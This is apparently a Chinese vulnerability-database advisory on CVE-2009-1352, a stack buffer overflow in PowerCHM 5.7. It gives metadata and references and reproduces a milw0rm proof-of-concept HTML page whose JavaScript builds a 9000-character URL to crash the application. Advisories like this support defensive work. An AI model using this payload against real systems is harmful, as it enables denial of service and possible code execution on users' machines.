Dawningsoft PowerCHM 栈缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117576 漏洞类型 缓冲区溢出
发布时间 2009-04-14 更新时间 2009-04-21
CVE编号 CVE-2009-1352 CNNVD-ID CNNVD-200904-407
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8434
https://cxsecurity.com/issue/WLB-2009040215
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-407
|漏洞详情
DawningsoftPowerCHM5.7版本存在栈缓冲区溢出漏洞。远程攻击者可以借助一个HTML文件,引起拒绝服务攻击(应用程序崩溃)以及可能执行任意代码。该HLML文件有一个对过长的URL的链接,比如.rarURL。
|漏洞EXP
<html>
<body>
<br>
<font style="font-family:arial;font-size:24px">PowerCHM 5.7 (Long url) Local stack overflow (SEH) POC</font><br>
<font style="font-family:arial;font-size:19px">found By SuB-ZeRo (fbh@hotmail.com) thnaks to hisok4</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:12px">Greetz:All friends and muslims HackeRs secdz.com</font><br>
<br>

<script language="JavaScript">
var crash = "http://";

for (i=0;i<9000;i++) crash +="%41";

crash += "/test.rar"

document.write ('<a href="' + crash + '">B00M!</a>');

</script>
</body>
</html>

# milw0rm.com [2009-04-14]
|参考资料

来源:XF
名称:powerchm-url-bo(49882)
链接:http://xforce.iss.net/xforce/xfdb/49882
来源:BID
名称:34517
链接:http://www.securityfocus.com/bid/34517
来源:MILW0RM
名称:8434
链接:http://www.milw0rm.com/exploits/8434